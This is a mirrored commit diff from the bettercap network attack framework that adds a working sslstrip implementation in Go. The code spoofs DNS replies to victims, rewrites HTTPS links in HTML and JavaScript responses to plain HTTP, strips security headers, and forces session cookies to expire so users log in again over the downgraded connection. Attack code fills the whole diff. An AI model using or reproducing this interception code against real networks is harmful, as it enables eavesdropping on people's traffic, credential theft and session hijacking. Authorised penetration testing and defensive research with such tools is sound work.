mirror of
https://github.com/bettercap/bettercap
synced 2025-08-19 13:09:49 -07:00
new: implemented sslstrip (ref #154)
This commit is contained in:
parent
d8223d9579
commit
2a601e1412
6 changed files with 231 additions and 203 deletions
|
@ -134,6 +134,7 @@ func (s *DNSSpoofer) dnsReply(pkt gopacket.Packet, peth *layers.Ethernet, pudp *
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
|
var eType layers.EthernetType
|
||||||
var ipv6 bool
|
var ipv6 bool
|
||||||
|
|
||||||
if nlayer.LayerType() == layers.LayerTypeIPv4 {
|
if nlayer.LayerType() == layers.LayerTypeIPv4 {
|
||||||
|
@ -141,18 +142,20 @@ func (s *DNSSpoofer) dnsReply(pkt gopacket.Packet, peth *layers.Ethernet, pudp *
|
||||||
src = pip.DstIP
|
src = pip.DstIP
|
||||||
dst = pip.SrcIP
|
dst = pip.SrcIP
|
||||||
ipv6 = false
|
ipv6 = false
|
||||||
|
eType = layers.EthernetTypeIPv4
|
||||||
|
|
||||||
} else {
|
} else {
|
||||||
pip := pkt.Layer(layers.LayerTypeIPv6).(*layers.IPv6)
|
pip := pkt.Layer(layers.LayerTypeIPv6).(*layers.IPv6)
|
||||||
src = pip.DstIP
|
src = pip.DstIP
|
||||||
dst = pip.SrcIP
|
dst = pip.SrcIP
|
||||||
ipv6 = true
|
ipv6 = true
|
||||||
|
eType = layers.EthernetTypeIPv6
|
||||||
}
|
}
|
||||||
|
|
||||||
eth := layers.Ethernet{
|
eth := layers.Ethernet{
|
||||||
SrcMAC: peth.DstMAC,
|
SrcMAC: peth.DstMAC,
|
||||||
DstMAC: target,
|
DstMAC: target,
|
||||||
EthernetType: layers.EthernetTypeIPv6,
|
EthernetType: eType,
|
||||||
}
|
}
|
||||||
|
|
||||||
answers := make([]layers.DNSResourceRecord, 0)
|
answers := make([]layers.DNSResourceRecord, 0)
|
||||||
|
|
|
@ -161,7 +161,7 @@ func TLSConfigFromCA(ca *tls.Certificate) func(host string, ctx *goproxy.ProxyCt
|
||||||
|
|
||||||
cert := getCachedCert(hostname, port)
|
cert := getCachedCert(hostname, port)
|
||||||
if cert == nil {
|
if cert == nil {
|
||||||
log.Info("Creating spoofed certificate for %s:%d", core.Yellow(hostname), port)
|
log.Debug("Creating spoofed certificate for %s:%d", core.Yellow(hostname), port)
|
||||||
cert, err = btls.SignCertificateForHost(ca, hostname, port)
|
cert, err = btls.SignCertificateForHost(ca, hostname, port)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
log.Warning("Cannot sign host certificate with provided CA: %s", err)
|
log.Warning("Cannot sign host certificate with provided CA: %s", err)
|
||||||
|
|
84
modules/http_proxy_base_cookietracker.go
Normal file
84
modules/http_proxy_base_cookietracker.go
Normal file
|
@ -0,0 +1,84 @@
|
||||||
|
package modules
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"net/http"
|
||||||
|
"strings"
|
||||||
|
"sync"
|
||||||
|
|
||||||
|
"github.com/bettercap/bettercap/log"
|
||||||
|
|
||||||
|
"github.com/elazarl/goproxy"
|
||||||
|
"github.com/jpillora/go-tld"
|
||||||
|
)
|
||||||
|
|
||||||
|
type CookieTracker struct {
|
||||||
|
sync.RWMutex
|
||||||
|
set map[string]bool
|
||||||
|
}
|
||||||
|
|
||||||
|
func NewCookieTracker() *CookieTracker {
|
||||||
|
return &CookieTracker{
|
||||||
|
set: make(map[string]bool),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (t *CookieTracker) domainOf(req *http.Request) string {
|
||||||
|
if parsed, err := tld.Parse(req.Host); err != nil {
|
||||||
|
log.Warning("Could not parse host %s: %s", req.Host, err)
|
||||||
|
return req.Host
|
||||||
|
} else {
|
||||||
|
return fmt.Sprintf("%s.%s", parsed.Domain, parsed.TLD)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (t *CookieTracker) keyOf(req *http.Request) string {
|
||||||
|
client := strings.Split(req.RemoteAddr, ":")[0]
|
||||||
|
domain := t.domainOf(req)
|
||||||
|
return fmt.Sprintf("%s-%s", client, domain)
|
||||||
|
}
|
||||||
|
|
||||||
|
func (t *CookieTracker) IsClean(req *http.Request) bool {
|
||||||
|
t.RLock()
|
||||||
|
defer t.RUnlock()
|
||||||
|
|
||||||
|
// we only clean GET requests
|
||||||
|
if req.Method != "GET" {
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
|
||||||
|
// does the request have any cookie?
|
||||||
|
cookie := req.Header.Get("Cookie")
|
||||||
|
if cookie == "" {
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
|
||||||
|
// was it already processed?
|
||||||
|
if _, found := t.set[t.keyOf(req)]; found == true {
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
|
||||||
|
// unknown session cookie
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
|
||||||
|
func (t *CookieTracker) Track(req *http.Request) {
|
||||||
|
t.Lock()
|
||||||
|
defer t.Unlock()
|
||||||
|
t.set[t.keyOf(req)] = true
|
||||||
|
}
|
||||||
|
|
||||||
|
func (t *CookieTracker) Expire(req *http.Request) *http.Response {
|
||||||
|
domain := t.domainOf(req)
|
||||||
|
redir := goproxy.NewResponse(req, "text/plain", 302, "")
|
||||||
|
|
||||||
|
for _, c := range req.Cookies() {
|
||||||
|
redir.Header.Add("Set-Cookie", fmt.Sprintf("%s=EXPIRED; path=/; domain=%s; Expires=Mon, 01-Jan-1990 00:00:00 GMT", c.Name, domain))
|
||||||
|
redir.Header.Add("Set-Cookie", fmt.Sprintf("%s=EXPIRED; path=/; domain=%s; Expires=Mon, 01-Jan-1990 00:00:00 GMT", c.Name, c.Domain))
|
||||||
|
}
|
||||||
|
|
||||||
|
redir.Header.Add("Location", req.URL.String())
|
||||||
|
redir.Header.Add("Connection", "close")
|
||||||
|
|
||||||
|
return redir
|
||||||
|
}
|
|
@ -13,11 +13,6 @@ import (
|
||||||
func (p *HTTPProxy) onRequestFilter(req *http.Request, ctx *goproxy.ProxyCtx) (*http.Request, *http.Response) {
|
func (p *HTTPProxy) onRequestFilter(req *http.Request, ctx *goproxy.ProxyCtx) (*http.Request, *http.Response) {
|
||||||
log.Debug("(%s) < %s %s %s%s", core.Green(p.Name), req.RemoteAddr, req.Method, req.Host, req.URL.Path)
|
log.Debug("(%s) < %s %s %s%s", core.Green(p.Name), req.RemoteAddr, req.Method, req.Host, req.URL.Path)
|
||||||
|
|
||||||
// sslstrip preprocessing, takes care of:
|
|
||||||
//
|
|
||||||
// - patching / removing security related headers
|
|
||||||
// - making unknown session cookies expire
|
|
||||||
// - handling stripped domains
|
|
||||||
redir := p.stripper.Preprocess(req, ctx)
|
redir := p.stripper.Preprocess(req, ctx)
|
||||||
if redir != nil {
|
if redir != nil {
|
||||||
// we need to redirect the user in order to make
|
// we need to redirect the user in order to make
|
||||||
|
|
62
modules/http_proxy_base_hosttracker.go
Normal file
62
modules/http_proxy_base_hosttracker.go
Normal file
|
@ -0,0 +1,62 @@
|
||||||
|
package modules
|
||||||
|
|
||||||
|
import (
|
||||||
|
"net"
|
||||||
|
"sync"
|
||||||
|
|
||||||
|
"github.com/bettercap/bettercap/log"
|
||||||
|
)
|
||||||
|
|
||||||
|
type Host struct {
|
||||||
|
Hostname string
|
||||||
|
Address net.IP
|
||||||
|
Resolved sync.WaitGroup
|
||||||
|
}
|
||||||
|
|
||||||
|
func NewHost(name string) *Host {
|
||||||
|
h := &Host{
|
||||||
|
Hostname: name,
|
||||||
|
Address: nil,
|
||||||
|
Resolved: sync.WaitGroup{},
|
||||||
|
}
|
||||||
|
|
||||||
|
h.Resolved.Add(1)
|
||||||
|
go func(ph *Host) {
|
||||||
|
defer ph.Resolved.Done()
|
||||||
|
if addrs, err := net.LookupIP(ph.Hostname); err == nil && len(addrs) > 0 {
|
||||||
|
ph.Address = make(net.IP, len(addrs[0]))
|
||||||
|
copy(ph.Address, addrs[0])
|
||||||
|
} else {
|
||||||
|
log.Error("Could not resolve %s: %s", ph.Hostname, err)
|
||||||
|
ph.Address = nil
|
||||||
|
}
|
||||||
|
}(h)
|
||||||
|
|
||||||
|
return h
|
||||||
|
}
|
||||||
|
|
||||||
|
type HostTracker struct {
|
||||||
|
sync.RWMutex
|
||||||
|
hosts map[string]*Host
|
||||||
|
}
|
||||||
|
|
||||||
|
func NewHostTracker() *HostTracker {
|
||||||
|
return &HostTracker{
|
||||||
|
hosts: make(map[string]*Host, 0),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (t *HostTracker) Track(host, stripped string) {
|
||||||
|
t.Lock()
|
||||||
|
defer t.Unlock()
|
||||||
|
t.hosts[stripped] = NewHost(host)
|
||||||
|
}
|
||||||
|
|
||||||
|
func (t *HostTracker) Unstrip(stripped string) *Host {
|
||||||
|
t.RLock()
|
||||||
|
defer t.RUnlock()
|
||||||
|
if host, found := t.hosts[stripped]; found == true {
|
||||||
|
return host
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
}
|
|
@ -7,7 +7,6 @@ import (
|
||||||
"net/http"
|
"net/http"
|
||||||
"regexp"
|
"regexp"
|
||||||
"strings"
|
"strings"
|
||||||
"sync"
|
|
||||||
|
|
||||||
"github.com/bettercap/bettercap/core"
|
"github.com/bettercap/bettercap/core"
|
||||||
"github.com/bettercap/bettercap/log"
|
"github.com/bettercap/bettercap/log"
|
||||||
|
@ -18,7 +17,6 @@ import (
|
||||||
"github.com/google/gopacket"
|
"github.com/google/gopacket"
|
||||||
"github.com/google/gopacket/layers"
|
"github.com/google/gopacket/layers"
|
||||||
"github.com/google/gopacket/pcap"
|
"github.com/google/gopacket/pcap"
|
||||||
"github.com/jpillora/go-tld"
|
|
||||||
)
|
)
|
||||||
|
|
||||||
var (
|
var (
|
||||||
|
@ -31,108 +29,11 @@ var (
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
|
|
||||||
type cookieTracker struct {
|
|
||||||
sync.RWMutex
|
|
||||||
set map[string]bool
|
|
||||||
}
|
|
||||||
|
|
||||||
func NewCookieTracker() *cookieTracker {
|
|
||||||
return &cookieTracker{
|
|
||||||
set: make(map[string]bool),
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
func (t *cookieTracker) domainOf(req *http.Request) string {
|
|
||||||
if parsed, err := tld.Parse(req.Host); err != nil {
|
|
||||||
log.Warning("Could not parse host %s: %s", req.Host, err)
|
|
||||||
return req.Host
|
|
||||||
} else {
|
|
||||||
return parsed.Domain + "." + parsed.TLD
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
func (t *cookieTracker) keyOf(req *http.Request) string {
|
|
||||||
client := strings.Split(req.RemoteAddr, ":")[0]
|
|
||||||
domain := t.domainOf(req)
|
|
||||||
return fmt.Sprintf("%s-%s", client, domain)
|
|
||||||
}
|
|
||||||
|
|
||||||
func (t *cookieTracker) IsClean(req *http.Request) bool {
|
|
||||||
t.RLock()
|
|
||||||
defer t.RUnlock()
|
|
||||||
|
|
||||||
// we only clean GET requests
|
|
||||||
if req.Method != "GET" {
|
|
||||||
return true
|
|
||||||
}
|
|
||||||
|
|
||||||
// does the request have any cookie?
|
|
||||||
cookie := req.Header.Get("Cookie")
|
|
||||||
if cookie == "" {
|
|
||||||
return true
|
|
||||||
}
|
|
||||||
|
|
||||||
// was it already processed?
|
|
||||||
if _, found := t.set[t.keyOf(req)]; found == true {
|
|
||||||
return true
|
|
||||||
}
|
|
||||||
|
|
||||||
// unknown session cookie
|
|
||||||
return false
|
|
||||||
}
|
|
||||||
|
|
||||||
func (t *cookieTracker) Track(req *http.Request) {
|
|
||||||
t.Lock()
|
|
||||||
defer t.Unlock()
|
|
||||||
t.set[t.keyOf(req)] = true
|
|
||||||
}
|
|
||||||
|
|
||||||
func (t *cookieTracker) Expire(req *http.Request) *http.Response {
|
|
||||||
domain := t.domainOf(req)
|
|
||||||
redir := goproxy.NewResponse(req, "text/plain", 302, "")
|
|
||||||
|
|
||||||
for _, c := range req.Cookies() {
|
|
||||||
redir.Header.Add("Set-Cookie", fmt.Sprintf("%s=EXPIRED; path=/; domain=%s; Expires=Mon, 01-Jan-1990 00:00:00 GMT", c.Name, domain))
|
|
||||||
redir.Header.Add("Set-Cookie", fmt.Sprintf("%s=EXPIRED; path=/; domain=%s; Expires=Mon, 01-Jan-1990 00:00:00 GMT", c.Name, c.Domain))
|
|
||||||
}
|
|
||||||
|
|
||||||
redir.Header.Add("Location", req.URL.String())
|
|
||||||
redir.Header.Add("Connection", "close")
|
|
||||||
|
|
||||||
return redir
|
|
||||||
}
|
|
||||||
|
|
||||||
type hostTracker struct {
|
|
||||||
sync.RWMutex
|
|
||||||
hosts map[string]string
|
|
||||||
}
|
|
||||||
|
|
||||||
func NewHostTracker() *hostTracker {
|
|
||||||
return &hostTracker{
|
|
||||||
hosts: make(map[string]string, 0),
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
func (t *hostTracker) Track(host, stripped string) {
|
|
||||||
t.Lock()
|
|
||||||
defer t.Unlock()
|
|
||||||
t.hosts[stripped] = host
|
|
||||||
}
|
|
||||||
|
|
||||||
func (t *hostTracker) Unstrip(stripped string) string {
|
|
||||||
t.RLock()
|
|
||||||
defer t.RUnlock()
|
|
||||||
if original, found := t.hosts[stripped]; found == true {
|
|
||||||
return original
|
|
||||||
}
|
|
||||||
return ""
|
|
||||||
}
|
|
||||||
|
|
||||||
type SSLStripper struct {
|
type SSLStripper struct {
|
||||||
enabled bool
|
enabled bool
|
||||||
session *session.Session
|
session *session.Session
|
||||||
cookies *cookieTracker
|
cookies *CookieTracker
|
||||||
hosts *hostTracker
|
hosts *HostTracker
|
||||||
handle *pcap.Handle
|
handle *pcap.Handle
|
||||||
pktSourceChan chan gopacket.Packet
|
pktSourceChan chan gopacket.Packet
|
||||||
}
|
}
|
||||||
|
@ -161,7 +62,7 @@ func (s *SSLStripper) dnsReply(pkt gopacket.Packet, peth *layers.Ethernet, pudp
|
||||||
who = t.String()
|
who = t.String()
|
||||||
}
|
}
|
||||||
|
|
||||||
log.Info("[%s] Sending spoofed DNS reply for %s %s to %s.", core.Green("dns"), core.Red(domain), core.Dim(redir), core.Bold(who))
|
log.Debug("[%s] Sending spoofed DNS reply for %s %s to %s.", core.Green("dns"), core.Red(domain), core.Dim(redir), core.Bold(who))
|
||||||
|
|
||||||
var err error
|
var err error
|
||||||
var src, dst net.IP
|
var src, dst net.IP
|
||||||
|
@ -172,25 +73,14 @@ func (s *SSLStripper) dnsReply(pkt gopacket.Packet, peth *layers.Ethernet, pudp
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
var ipv6 bool
|
pip := pkt.Layer(layers.LayerTypeIPv4).(*layers.IPv4)
|
||||||
|
src = pip.DstIP
|
||||||
if nlayer.LayerType() == layers.LayerTypeIPv4 {
|
dst = pip.SrcIP
|
||||||
pip := pkt.Layer(layers.LayerTypeIPv4).(*layers.IPv4)
|
|
||||||
src = pip.DstIP
|
|
||||||
dst = pip.SrcIP
|
|
||||||
ipv6 = false
|
|
||||||
|
|
||||||
} else {
|
|
||||||
pip := pkt.Layer(layers.LayerTypeIPv6).(*layers.IPv6)
|
|
||||||
src = pip.DstIP
|
|
||||||
dst = pip.SrcIP
|
|
||||||
ipv6 = true
|
|
||||||
}
|
|
||||||
|
|
||||||
eth := layers.Ethernet{
|
eth := layers.Ethernet{
|
||||||
SrcMAC: peth.DstMAC,
|
SrcMAC: peth.DstMAC,
|
||||||
DstMAC: target,
|
DstMAC: target,
|
||||||
EthernetType: layers.EthernetTypeIPv6,
|
EthernetType: layers.EthernetTypeIPv4,
|
||||||
}
|
}
|
||||||
|
|
||||||
answers := make([]layers.DNSResourceRecord, 0)
|
answers := make([]layers.DNSResourceRecord, 0)
|
||||||
|
@ -214,50 +104,26 @@ func (s *SSLStripper) dnsReply(pkt gopacket.Packet, peth *layers.Ethernet, pudp
|
||||||
Answers: answers,
|
Answers: answers,
|
||||||
}
|
}
|
||||||
|
|
||||||
|
ip4 := layers.IPv4{
|
||||||
|
Protocol: layers.IPProtocolUDP,
|
||||||
|
Version: 4,
|
||||||
|
TTL: 64,
|
||||||
|
SrcIP: src,
|
||||||
|
DstIP: dst,
|
||||||
|
}
|
||||||
|
|
||||||
|
udp := layers.UDP{
|
||||||
|
SrcPort: pudp.DstPort,
|
||||||
|
DstPort: pudp.SrcPort,
|
||||||
|
}
|
||||||
|
|
||||||
|
udp.SetNetworkLayerForChecksum(&ip4)
|
||||||
|
|
||||||
var raw []byte
|
var raw []byte
|
||||||
|
err, raw = packets.Serialize(ð, &ip4, &udp, &dns)
|
||||||
if ipv6 == true {
|
if err != nil {
|
||||||
ip6 := layers.IPv6{
|
log.Error("Error serializing packet: %s.", err)
|
||||||
Version: 6,
|
return
|
||||||
NextHeader: layers.IPProtocolUDP,
|
|
||||||
HopLimit: 64,
|
|
||||||
SrcIP: src,
|
|
||||||
DstIP: dst,
|
|
||||||
}
|
|
||||||
|
|
||||||
udp := layers.UDP{
|
|
||||||
SrcPort: pudp.DstPort,
|
|
||||||
DstPort: pudp.SrcPort,
|
|
||||||
}
|
|
||||||
|
|
||||||
udp.SetNetworkLayerForChecksum(&ip6)
|
|
||||||
|
|
||||||
err, raw = packets.Serialize(ð, &ip6, &udp, &dns)
|
|
||||||
if err != nil {
|
|
||||||
log.Error("Error serializing packet: %s.", err)
|
|
||||||
return
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
ip4 := layers.IPv4{
|
|
||||||
Protocol: layers.IPProtocolUDP,
|
|
||||||
Version: 4,
|
|
||||||
TTL: 64,
|
|
||||||
SrcIP: src,
|
|
||||||
DstIP: dst,
|
|
||||||
}
|
|
||||||
|
|
||||||
udp := layers.UDP{
|
|
||||||
SrcPort: pudp.DstPort,
|
|
||||||
DstPort: pudp.SrcPort,
|
|
||||||
}
|
|
||||||
|
|
||||||
udp.SetNetworkLayerForChecksum(&ip4)
|
|
||||||
|
|
||||||
err, raw = packets.Serialize(ð, &ip4, &udp, &dns)
|
|
||||||
if err != nil {
|
|
||||||
log.Error("Error serializing packet: %s.", err)
|
|
||||||
return
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
|
|
||||||
log.Debug("Sending %d bytes of packet ...", len(raw))
|
log.Debug("Sending %d bytes of packet ...", len(raw))
|
||||||
|
@ -280,12 +146,8 @@ func (s *SSLStripper) onPacket(pkt gopacket.Packet) {
|
||||||
for _, q := range dns.Questions {
|
for _, q := range dns.Questions {
|
||||||
domain := string(q.Name)
|
domain := string(q.Name)
|
||||||
original := s.hosts.Unstrip(domain)
|
original := s.hosts.Unstrip(domain)
|
||||||
if original != "" {
|
if original != nil && original.Address != nil {
|
||||||
if address, err := net.LookupIP(original); err == nil && len(address) > 0 {
|
s.dnsReply(pkt, eth, udp, domain, original.Address, dns, eth.SrcMAC)
|
||||||
s.dnsReply(pkt, eth, udp, domain, address[0], dns, eth.SrcMAC)
|
|
||||||
} else {
|
|
||||||
log.Error("Could not resolve %s: %s", original, err)
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
@ -355,35 +217,11 @@ func (s *SSLStripper) stripResponseHeaders(res *http.Response) {
|
||||||
res.Header.Set("Access-Control-Allow-Headers", "*")
|
res.Header.Set("Access-Control-Allow-Headers", "*")
|
||||||
}
|
}
|
||||||
|
|
||||||
// sslstrip preprocessing, takes care of:
|
func (s *SSLStripper) isContentStrippable(res *http.Response) bool {
|
||||||
//
|
|
||||||
// - patching / removing security related headers
|
|
||||||
// - making unknown session cookies expire
|
|
||||||
// - handling stripped domains
|
|
||||||
func (s *SSLStripper) Preprocess(req *http.Request, ctx *goproxy.ProxyCtx) (redir *http.Response) {
|
|
||||||
if s.enabled == false {
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
// preprocess request headers
|
|
||||||
s.stripRequestHeaders(req)
|
|
||||||
|
|
||||||
// check if we need to redirect the user in order
|
|
||||||
// to make unknown session cookies expire
|
|
||||||
if s.cookies.IsClean(req) == false {
|
|
||||||
log.Info("[%s] Sending expired cookies for %s to %s", core.Green("sslstrip"), core.Yellow(req.Host), req.RemoteAddr)
|
|
||||||
s.cookies.Track(req)
|
|
||||||
redir = s.cookies.Expire(req)
|
|
||||||
}
|
|
||||||
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
func (s *SSLStripper) isHTML(res *http.Response) bool {
|
|
||||||
for name, values := range res.Header {
|
for name, values := range res.Header {
|
||||||
for _, value := range values {
|
for _, value := range values {
|
||||||
if name == "Content-Type" {
|
if name == "Content-Type" {
|
||||||
return strings.HasPrefix(value, "text/html")
|
return strings.HasPrefix(value, "text/") || strings.Contains(value, "javascript")
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
@ -414,10 +252,43 @@ func (s *SSLStripper) processURL(url string) string {
|
||||||
return url
|
return url
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// sslstrip preprocessing, takes care of:
|
||||||
|
//
|
||||||
|
// - patching / removing security related headers
|
||||||
|
// - handling stripped domains
|
||||||
|
// - making unknown session cookies expire
|
||||||
|
func (s *SSLStripper) Preprocess(req *http.Request, ctx *goproxy.ProxyCtx) (redir *http.Response) {
|
||||||
|
if s.enabled == false {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// preprocess request headers
|
||||||
|
s.stripRequestHeaders(req)
|
||||||
|
|
||||||
|
// handle stripped domains
|
||||||
|
original := s.hosts.Unstrip(req.Host)
|
||||||
|
if original != nil {
|
||||||
|
log.Info("[%s] Replacing host %s with %s in request from %s", core.Green("sslstrip"), core.Bold(req.Host), core.Yellow(original.Hostname), req.RemoteAddr)
|
||||||
|
req.Host = original.Hostname
|
||||||
|
req.URL.Host = original.Hostname
|
||||||
|
req.Header.Set("Host", original.Hostname)
|
||||||
|
}
|
||||||
|
|
||||||
|
// check if we need to redirect the user in order
|
||||||
|
// to make unknown session cookies expire
|
||||||
|
if s.cookies.IsClean(req) == false {
|
||||||
|
log.Info("[%s] Sending expired cookies for %s to %s", core.Green("sslstrip"), core.Yellow(req.Host), req.RemoteAddr)
|
||||||
|
s.cookies.Track(req)
|
||||||
|
redir = s.cookies.Expire(req)
|
||||||
|
}
|
||||||
|
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
func (s *SSLStripper) Process(res *http.Response, ctx *goproxy.ProxyCtx) {
|
func (s *SSLStripper) Process(res *http.Response, ctx *goproxy.ProxyCtx) {
|
||||||
if s.enabled == false {
|
if s.enabled == false {
|
||||||
return
|
return
|
||||||
} else if s.isHTML(res) == false {
|
} else if s.isContentStrippable(res) == false {
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -434,12 +305,25 @@ func (s *SSLStripper) Process(res *http.Response, ctx *goproxy.ProxyCtx) {
|
||||||
body := string(raw)
|
body := string(raw)
|
||||||
urls := make(map[string]string, 0)
|
urls := make(map[string]string, 0)
|
||||||
matches := httpsLinksParser.FindAllString(body, -1)
|
matches := httpsLinksParser.FindAllString(body, -1)
|
||||||
for _, url := range matches {
|
for _, u := range matches {
|
||||||
urls[url] = s.processURL(url)
|
// make sure we only strip stuff we're able to
|
||||||
|
// resolve and process
|
||||||
|
if strings.ContainsRune(u, '.') == true {
|
||||||
|
urls[u] = s.processURL(u)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
nurls := len(urls)
|
||||||
|
if nurls > 0 {
|
||||||
|
plural := "s"
|
||||||
|
if nurls == 1 {
|
||||||
|
plural = ""
|
||||||
|
}
|
||||||
|
log.Info("[%s] Stripping %d SSL link%s from %s", core.Green("sslstrip"), nurls, plural, core.Bold(res.Request.Host))
|
||||||
}
|
}
|
||||||
|
|
||||||
for url, stripped := range urls {
|
for url, stripped := range urls {
|
||||||
log.Info("Stripping url %s to %s", core.Bold(url), core.Yellow(stripped))
|
log.Debug("Stripping url %s to %s", core.Bold(url), core.Yellow(stripped))
|
||||||
|
|
||||||
body = strings.Replace(body, url, stripped, -1)
|
body = strings.Replace(body, url, stripped, -1)
|
||||||
|
|
||||||
|
|
Loading…
Add table
Add a link
Reference in a new issue